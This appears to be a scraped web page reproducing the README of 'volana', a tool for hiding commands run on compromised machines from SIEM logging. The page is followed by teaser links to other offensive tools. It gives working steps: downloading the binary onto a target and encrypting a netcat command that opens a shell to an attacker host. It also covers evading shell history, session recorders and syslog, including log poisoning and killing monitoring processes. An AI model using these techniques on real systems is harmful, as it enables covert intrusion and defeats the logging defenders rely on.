During pentest, an important aspect is to be stealth. For this reason you should clear your tracks after your passage.
Nevertheless, many infrastructures log command and send them to a SIEM in a real time making the afterwards cleaning part alone useless.volana
provide a simple way to hide commands executed on compromised machine by providing it self shell runtime (enter your command, volana executes for you).
Like this you clear your tracks DURING your passage
You need to get an interactive shell. (Find a way to spawn it, you are a hacker, it’s your job ! otherwise).
Then download it on target machine and launch it. that’s it, now you can type the command you want to be stealthy executed
## Download it from github release
## If you do not have internet access from compromised machine, find another way
curl -lO -L https://github.com/ariary/volana/releases/latest/download/volana
## Execute it
./volana
## You are now under the radar
volana » echo "Hi SIEM team! Do you find me?" > /dev/null 2>&1 #you are allowed to be a bit cocky
volana » [command]
Keyword for volana console:
ring
: enable ring mode ie each command is launched with plenty others to cover tracks (from solution that monitor system call)exit
: exit volana consoleImagine you have a non interactive shell (webshell or blind rce), you could use encrypt
and decrypt
subcommand. Previously, you need to build volana
with embedded encryption key.
On attacker machine
## Build volana with encryption key
make build.volana-with-encryption
## Transfer it on TARGET (the unique detectable command)
## [...]
## Encrypt the command you want to stealthy execute
## (Here a nc bindshell to obtain a interactive shell)
volana encr "nc [attacker_ip] [attacker_port] -e /bin/bash"
>>> ENCRYPTED COMMAND
Copy encrypted command and executed it with your rce on target machine
./volana decr [encrypted_command]
## Now you have a bindshell, spawn it to make it interactive and use volana usually to be stealth (./volana). + Don't forget to remove volana binary before leaving (cause decryption key can easily be retrieved from it)
Because we want to be protected against systems that trigger alert for base64
use or that seek base64 text in command.
Also we want to make investigation difficult and base64 isn’t a real brake.
Keep in mind that volana
is not a miracle that will make you totally invisible. Its aim is to make intrusion detection and investigation harder.
By detected we mean if we are able to trigger an alert if a certain command has been executed.
Only the volana
launching command line will be catched. However, by adding a space before executing it, the default bash behavior is to not save it
.bash_history
, “.zsh_history” etc ..opensnoop
)script
, screen -L
, sexonthebash
, ovh-ttyrec
, etc..) pkill -9 script
screen
is a bit more difficult to avoid, however it does not register input (secret input: stty -echo
=> avoid)volana
with encryption/var/log/auth.log
) sudo
or su
commandslogger -p auth.info "No hacker is poisoning your syslog solution, don't worry"
)LD_PRELOAD
injection to make log Sorry for the clickbait title, but no money will be provided for contibutors.
Let me know if you have found:
volana
volana
commandsExploit-Street, where we dive into the ever-evolving world of cybersecurity with a focus on Local…
Shadow Dumper is a powerful tool used to dump LSASS (Local Security Authority Subsystem Service)…
shadow-rs is a Windows kernel rootkit written in Rust, demonstrating advanced techniques for kernel manipulation…
Extract and execute a PE embedded within a PNG file using an LNK file. The…
Embark on the journey of becoming a certified Red Team professional with our definitive guide.…
This repository contains proof of concept exploits for CVE-2024-5836 and CVE-2024-6778, which are vulnerabilities within…